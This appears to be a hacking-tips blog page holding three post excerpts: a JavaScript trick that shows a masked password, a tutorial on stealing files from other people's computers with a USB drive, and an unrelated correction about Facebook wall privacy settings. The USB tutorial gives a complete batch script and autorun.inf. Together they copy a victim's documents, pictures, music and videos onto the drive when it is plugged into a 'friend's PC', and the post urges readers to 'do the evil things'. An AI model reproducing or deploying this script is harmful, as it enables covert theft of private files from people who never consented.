Facebook
RSS

Reveal *****(Asterisk) Passwords Using Javascript


Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com) 

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox. 
[ Read More ]

How to Steal people files using usb drive


I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit

:ERROR
exit

What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.
[ Read More ]

Huge Correction re. Facebook Wall Privacy


I'm really annoyed about having to write this post because I believe the wrong info I posted is mainly the fault of Facebook's Bad Interface Design. And the worst part is that, because it's related to protecting your privacy, it could have serious consequences for some people.

In two earlier posts, Privacy Controls in Facebook Pt. 1 and Reader Question: Restricting Access to Wall Posts, I described how you can customize your Privacy Settings to specify which of your friends can/can't see what's on your Wall (on your Profile page). And I showed the section on your Profile Privacy Settings page where you can edit these settings—not surprisingly called Wall Posts.
But then yesterday, when a reader wrote me with a specific question related to privacy settings, I was doing some testing and discovered something surprising. I restricted one of my friends from seeing my Wall Posts and then typed her name in the box for "See how a friend sees your profile" and it still showed my Wall Posts. I asked my friend to confirm if she could see things on my Wall (in case the problem was with the "See how..." feature) and she said she could.
At that point, I thought I had discovered a major bug and did a Google search to see if anyone else had reported it and couldn't find anything. Hmmm...
Well, it turns out that the Wall Posts section doesn't apply to posts you put on your Wall—only to ones that your friends have posted. I confirmed with my friend that she couldn't see any posts from my other friends. (But she could still see comments from my other friends on any of my status lines, links, etc. that appeared on my Wall.)
I won't go into the whole story of how I found out this is the way it's supposed to work but I will say that Facebook does actually tell you this... IF you click on the little question mark next to the Wall Posts heading.
Now call me crazy, but I think if I say I'm restricting someone from seeing my Wall Posts, I'm expecting they're restricted from seeing ALL my Wall Posts, including mine.
So how DO you stop people from seeing your Wall Posts as well? Well, you'll have to do that in a few places. If you don't want them to see your status lines or links you post to other sites, then you need to use the Status and Links dropdown box on the same Profile Privacy Settings page.
Note: If you do customize settings on this page, make sure you click the Save Changes button at the bottom of the page to make them take effect.
If you don't want them to see your Photos or Notes or info from any other applications you're using, you'll have to change those settings for each one from the Application Settings page (get there from the Settings dropdown menu at the top of the page). For example, here is the Settings box for my Scrabble application, where I can restrict certain people from seeing anything I've done with that game.
You can also prevent having any stories from the application from being posted to your Wall in the first place, from the Additional Permissions tab.
If any of this isn't clear, please let me know. I'll be updating the earlier posts as well to clarify how this works. I apologize for any confusion or inconvenience they may have caused you.
[ Read More ]